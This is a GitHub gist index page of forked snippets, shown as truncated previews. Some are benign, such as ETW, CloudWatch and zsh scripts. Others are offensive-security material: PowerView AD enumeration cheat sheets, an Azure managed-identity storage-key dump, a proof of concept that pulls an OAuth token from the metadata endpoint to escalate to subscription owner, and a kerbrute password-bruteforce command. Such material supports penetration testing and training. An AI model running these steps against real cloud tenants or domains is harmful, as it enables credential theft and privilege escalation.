Skip to content

Instantly share code, notes, and snippets.

View BigFoxses's full-sized avatar

BigFoxses

3 followers · 0 following
View GitHub Profile
@BigFoxses
BigFoxses / Get-EtwTraceProvider.ps1
Created January 14, 2023 09:49 — forked from guitarrapc/Get-EtwTraceProvider.ps1
ETW (Event Tracing for Windows) Providers and their GUIDs for Windows 10 x64
#Requires -RunAsAdministrator
#Requires -Version 5.0
# requires Windows 10
Get-EtwTraceProvider | Select-Object SessionName, Guid | sort SessionName
# as Markdown
<#
#Requires -RunAsAdministrator
$result = Get-EtwTraceProvider | sort SessionName
$result | %{"|Name|GUID|";"|----|----|";}{"|$($_.SessionName)|$($_.Guid)|"}
#>
@BigFoxses
BigFoxses / Enterprise Security Architecture Note.md
Created January 10, 2023 10:18 — forked from mylamour/Enterprise Security Architecture Note.md
Generated from Enterprise Security Architecture.pdf Automatically

1. The Meaning of Security

1.1. The Cultural Legacy: Business Prevention

  • Security has a bad reputation for getting in the way of real business
  • This reputation has developed because of the way security professionals have practised
  • We need an accurate definition of what we mean by ‘security’
  • A technical definition of security may not be helpful
  • Security can be defined only relative to the value and risk propositions of the business

1.2. Measuring and Prioritising Business Risk

  • Risk is a combination of asset value, business impact, threat and vulnerability
  • Risk management is a combination of risk assessment and ‘risk mitigation’
@BigFoxses
BigFoxses / PowerView-3.0.ps1
Created December 9, 2022 11:43 — forked from macostag/PowerView-3.0.ps1
PowerView 3.0 Cheat Sheets.
###################################
# Domain Enumeration
###################################
# Get SID for the current domain.
Get-DomainSID
# Get object of another domain.
Get-Domain -Domain domain.local
# Get domain controllers for the current/specified domain.
@BigFoxses
BigFoxses / windowsnetworking.bat
Created November 18, 2022 12:50 — forked from tuksik/windowsnetworking.bat
Windows - Firewall / PortForwarding / Network
# ------------------ NETSH ---------------
#
#for help: $ netsh /?
#NETSTAT
#
#usefull
netstat -bn
@BigFoxses
BigFoxses / get-MIStorageKeys.ps1
Created November 1, 2022 02:48 — forked from kfosaaen/get-MIStorageKeys.ps1
A PowerShell function to call Azure rest APIs using a VM Managed Identity to list available Storage Account access keys
Function get-MIStorageKeys{
# Author: Karl Fosaaen (@kfosaaen), NetSPI - 2020
# Description: PowerShell function for enumerating available storage account keys from a VM Managed Identity.
# Pipe to "Export-Csv -NoTypeInformation" for easier exporting
# Use the subID and ArmToken parameters to specify bearer tokens and subscriptions, handy for compromised bearer tokens from other services (CloudShell/AutomationAccounts)
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,
@BigFoxses
BigFoxses / MI-Owner-Escalation.ps1
Created November 1, 2022 02:42 — forked from kfosaaen/MI-Owner-Escalation.ps1
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
@BigFoxses
BigFoxses / PowerView-3.0-tricks.ps1
Created October 2, 2022 12:39 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@BigFoxses
BigFoxses / get_cloudwatch_logs.py
Created September 20, 2022 13:11 — forked from eldondevcg/get_cloudwatch_logs.py
Pull down cloudwatch logs with boto
# IF YOU INCUR HUGE COSTS WITH THIS OR IT BREAKS DON'T BLAME ME License
# This is a throw-away script I wrote to pull the json events for all of the streams from a cloudwatch log
# For some reason, the naive way to do vpc network logging does logging to different streams in a cloudwatch
# log based on interface.
# Great for diagnosing lots of things, and generating verbose logs, but for the broad-stroke analysis I was doing,
# all I really wanted was the basic data. This would have been easier if I had logged to s3, but I did not see a
# way to do that in 2 clicks.
group_name = 'CHANGEME'
@BigFoxses
BigFoxses / kerberos_attacks_cheatsheet.md
Created June 23, 2022 13:14 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@BigFoxses
BigFoxses / install-zsh-stuff.md
Created May 1, 2022 04:29 — forked from aclarknexient/install-zsh-stuff.md
Quick HOWTO install fzf oh-my-zsh powerlevel10k fd ripgrep on MacOS